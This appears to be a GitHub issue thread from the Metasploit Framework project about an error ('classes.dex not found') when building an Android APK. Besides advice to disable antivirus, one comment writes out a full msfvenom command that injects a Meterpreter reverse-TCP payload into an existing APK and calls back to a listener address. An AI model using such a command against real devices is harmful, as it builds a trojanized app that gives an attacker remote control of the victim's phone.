### ISSUE TITLE
Cannot create an android apk

### ISSUE THREAD

**Issue by Hirukshacoder** [rapid7/metasploit-framework#16345]
I cannot create an apk its says Error: android/apk/classes.dex not found
If anyone knows how to solve this pls let me know!!!

**Comment by timwr** [comment]
This normally happens when antivirus has deleted or quarantined that file (classes.dex)
The fix is to disable your antivirus and reinstall metasploit.

**Comment by Drjacky** [comment]
@timwr 
I disabled the antivirus but still get the error!
There is no `android` folder under `metasploit-framework` folder!
I followed both https://gist.github.com/xl7dev/a19da077792c5894529f and installed pkg manually but when I run
```bash
./msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp -x ~/Desktop/ttt.apk LHOST=192.168.0.150 LPORT=4444 -f raw -o /tmp/ttt-meterpreter.apk
```
I get:
> Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Using APK template: /Users/userrr/Desktop/ttt.apk
Error: android/apk/classes.dex not found
